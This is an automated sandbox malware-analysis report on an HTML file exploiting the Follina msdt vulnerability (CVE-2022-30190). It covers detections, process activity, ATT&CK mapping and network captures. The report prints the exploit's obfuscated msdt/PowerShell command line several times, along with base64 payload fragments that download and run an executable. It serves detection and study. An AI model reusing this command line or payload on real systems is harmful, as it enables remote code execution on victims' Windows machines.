Windows Analysis Report
fbGUvJ4AdV.html

Overview

General Information

Sample Name:fbGUvJ4AdV.html
Analysis ID:696621
MD5:da3469806af3aacbbbd22a763343fff2
SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
Tags: CVE-2022-30190, Exploit, html

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Classification

  • System is w10x64
  • chrome.exe (PID: 5708 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • msdt.exe (PID: 6208 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 1108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
No Sigma rule has matched
No Snort rule has matched


        AV Detection

Source: fbGUvJ4AdV.html | Virustotal: Detection: 11%

        Exploits

Source: Yara match | File source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\GoogleUpdater
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: unknown | DNS traffic detected: queries for: clients2.google.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: global traffic | HTTP traffic detected:
  GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
  Host: clients2.google.com
  Connection: keep-alive
  X-Goog-Update-Interactivity: fg
  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
  X-Goog-Update-Updater: chromecrx-104.0.5112.81
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: unknown | HTTP traffic detected:
  POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
  Host: accounts.google.com
  Connection: keep-alive
  Content-Length: 1
  Origin: https://www.google.com
  Content-Type: application/x-www-form-urlencoded
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: fbGUvJ4AdV.html | Virustotal: Detection: 11%
Source: C:\Windows\System32\msdt.exe | File created: C:\Users\user\AppData\Local\Temp\msdtadmin
Source: C:\Windows\System32\msdt.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine | Classification label: mal56.expl.winHTML@39/0@4/9
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (32 occurrences)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Program Files\Google\GoogleUpdater
Source: C:\Windows\System32\msdt.exe | Automated click: Next (17 occurrences)
Source: C:\Windows\System32\msdt.exe | File opened: C:\Windows\system32\MSFTEDIT.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\GoogleUpdater
Source: fbGUvJ4AdV.html | String: entropy: 5.72, length: 262, content: "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[
Source: fbGUvJ4AdV.html | String: entropy: 5.27, length: 145, content: "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUo
Source: fbGUvJ4AdV.html | String: entropy: 5.31, length: 116, content: "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGU
Source: fbGUvJ4AdV.html | String: entropy: 5.44, length: 148, content: "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3A
Source: C:\Windows\System32\msdt.exe | Window / User API: threadDelayed 2734
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'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'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22 (3 occurrences)
MITRE ATT&CK matrix (techniques listed per tactic; the number in parentheses is the count of matched signatures for that technique):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Command and Scripting Interpreter (1), Scripting (1), At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading (2), Process Injection (1), Scripting (1), Binary Padding, Software Packing
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Application Window Discovery (1), System Information Discovery (1), Query Registry, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Encrypted Channel (1), Data Encoding (1), Non-Application Layer Protocol (3), Application Layer Protocol (4), Ingress Tool Transfer (1)
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
Impact: Modify System Partition, Device Lockout, Delete Device Data
Source | Detection | Scanner | Label
fbGUvJ4AdV.html | 12% | ReversingLabs | Script.Exploit.Heuristic
fbGUvJ4AdV.html | 12% | Virustotal |
fbGUvJ4AdV.html | 0% | Metadefender |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
accounts.google.com | 216.58.215.237 | true | false | | high
www.google.com | 172.217.168.36 | true | false | | high
clients.l.google.com | 172.217.168.78 | true | false | | high
clients2.google.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 | false | | high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
                    IP
                    192.168.2.1
                    192.168.2.4
                    192.168.2.5
                    192.168.2.23
                    127.0.0.1
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:696621
                    Start date and time:2022-09-02 15:27:50 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:fbGUvJ4AdV.html
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:25
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • GSI enabled (Javascript)
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal56.expl.winHTML@39/0@4/9
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .html
                    • Adjust boot time
                    • Enable AMSI
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
                    • Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
• Not all processes were analyzed; the report is missing behavior information
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                    No simulations
No context
                    No created / dropped files found
                    File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Entropy (8bit):6.049533660136345
                    TrID:
                      File name:fbGUvJ4AdV.html
                      File size:19189
                      MD5:da3469806af3aacbbbd22a763343fff2
                      SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
                      SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
                      SHA512:7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d
                      SSDEEP:384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse
                      TLSH:A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A
                      File Content Preview:<!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh
                      Icon Hash:78d0a8cccc88c460
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 2, 2022 15:28:54.879998922 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.880044937 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.880124092 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.880600929 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.880621910 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.894287109 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.894330978 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.894418001 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.894710064 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.894727945 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.943497896 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.960045099 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.989614010 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.989650965 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.989794970 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.989814043 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.990809917 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.990840912 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.990910053 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.991908073 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:54.992002010 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:54.993104935 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:54.993181944 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:54.993199110 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:55.175978899 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.073260069 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.073594093 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.073594093 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.073848963 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.073986053 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.074013948 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.074413061 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109338999 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109447956 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.109489918 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109589100 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:56.109668970 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.115366936 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.130569935 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.130816936 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.130831957 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.130899906 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.146040916 CEST49750443192.168.2.3216.58.215.237
                      Sep 2, 2022 15:28:56.146084070 CEST44349750216.58.215.237192.168.2.3
                      Sep 2, 2022 15:28:56.148969889 CEST49749443192.168.2.3172.217.168.78
                      Sep 2, 2022 15:28:56.148992062 CEST44349749172.217.168.78192.168.2.3
                      Sep 2, 2022 15:28:57.917635918 CEST49756443192.168.2.3172.217.168.36
                      Sep 2, 2022 15:28:57.917695045 CEST44349756172.217.168.36192.168.2.3
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Sep 2, 2022 15:28:54.772237062 CEST | 51139 | 53 | 192.168.2.3 | 8.8.8.8
                      Sep 2, 2022 15:28:54.772720098 CEST | 52955 | 53 | 192.168.2.3 | 8.8.8.8
                      Sep 2, 2022 15:28:54.799750090 CEST | 53 | 52955 | 8.8.8.8 | 192.168.2.3
                      Sep 2, 2022 15:28:54.801990986 CEST | 53 | 51139 | 8.8.8.8 | 192.168.2.3
                      Sep 2, 2022 15:28:57.896194935 CEST | 57704 | 53 | 192.168.2.3 | 8.8.8.8
                      Sep 2, 2022 15:28:57.915808916 CEST | 53 | 57704 | 8.8.8.8 | 192.168.2.3
                      Sep 2, 2022 15:29:57.981518030 CEST | 58119 | 53 | 192.168.2.3 | 8.8.8.8
                      Sep 2, 2022 15:29:58.001106977 CEST | 53 | 58119 | 8.8.8.8 | 192.168.2.3
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      Sep 2, 2022 15:28:54.772237062 CEST | 192.168.2.3 | 8.8.8.8 | 0x5880 | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001)
                      Sep 2, 2022 15:28:54.772720098 CEST | 192.168.2.3 | 8.8.8.8 | 0xbec1 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001)
                      Sep 2, 2022 15:28:57.896194935 CEST | 192.168.2.3 | 8.8.8.8 | 0x7fb0 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
                      Sep 2, 2022 15:29:57.981518030 CEST | 192.168.2.3 | 8.8.8.8 | 0x9f76 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                      Sep 2, 2022 15:28:54.799750090 CEST | 8.8.8.8 | 192.168.2.3 | 0xbec1 | No error (0) | accounts.google.com | - | 216.58.215.237 | A (IP address) | IN (0x0001)
                      Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | clients2.google.com | clients.l.google.com | - | CNAME (Canonical name) | IN (0x0001)
                      Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | clients.l.google.com | - | 172.217.168.78 | A (IP address) | IN (0x0001)
                      Sep 2, 2022 15:28:57.915808916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7fb0 | No error (0) | www.google.com | - | 172.217.168.36 | A (IP address) | IN (0x0001)
                      Sep 2, 2022 15:29:58.001106977 CEST | 8.8.8.8 | 192.168.2.3 | 0x9f76 | No error (0) | www.google.com | - | 172.217.168.36 | A (IP address) | IN (0x0001)
                      • accounts.google.com
                      • clients2.google.com
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.3 | 49750 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | kBytes transferred | Direction | Data
                      2022-09-02 13:28:56 UTC | 0 | OUT | POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                      Host: accounts.google.com
                      Connection: keep-alive
                      Content-Length: 1
                      Origin: https://www.google.com
                      Content-Type: application/x-www-form-urlencoded
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
                      2022-09-02 13:28:56 UTC | 0 | OUT | Data Raw: 20
                      Data Ascii:
                      2022-09-02 13:28:56 UTC | 3 | IN | HTTP/1.1 200 OK
                      Content-Type: application/json; charset=utf-8
                      Access-Control-Allow-Origin: https://www.google.com
                      Access-Control-Allow-Credentials: true
                      X-Content-Type-Options: nosniff
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 02 Sep 2022 13:28:56 GMT
                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                      Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                      Content-Security-Policy: script-src 'report-sample' 'nonce-0X5lVZWT_mNw5ovhaKMYPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                      Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Server: ESF
                      X-XSS-Protection: 0
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2022-09-02 13:28:56 UTC | 4 | IN | Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                      Data Ascii: 11["gaia.l.a.r",[]]
                      2022-09-02 13:28:56 UTC | 4 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.3 | 49749 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | kBytes transferred | Direction | Data
                      2022-09-02 13:28:56 UTC | 0 | OUT | GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                      Host: clients2.google.com
                      Connection: keep-alive
                      X-Goog-Update-Interactivity: fg
                      X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                      X-Goog-Update-Updater: chromecrx-104.0.5112.81
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2022-09-02 13:28:56 UTC | 1 | IN | HTTP/1.1 200 OK
                      Content-Security-Policy: script-src 'report-sample' 'nonce-2NqIu_3Ygyr6l2RUZH06pw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 02 Sep 2022 13:28:56 GMT
                      Content-Type: text/xml; charset=UTF-8
                      X-Daynum: 5723
                      X-Daystart: 23336
                      X-Content-Type-Options: nosniff
                      X-Frame-Options: SAMEORIGIN
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
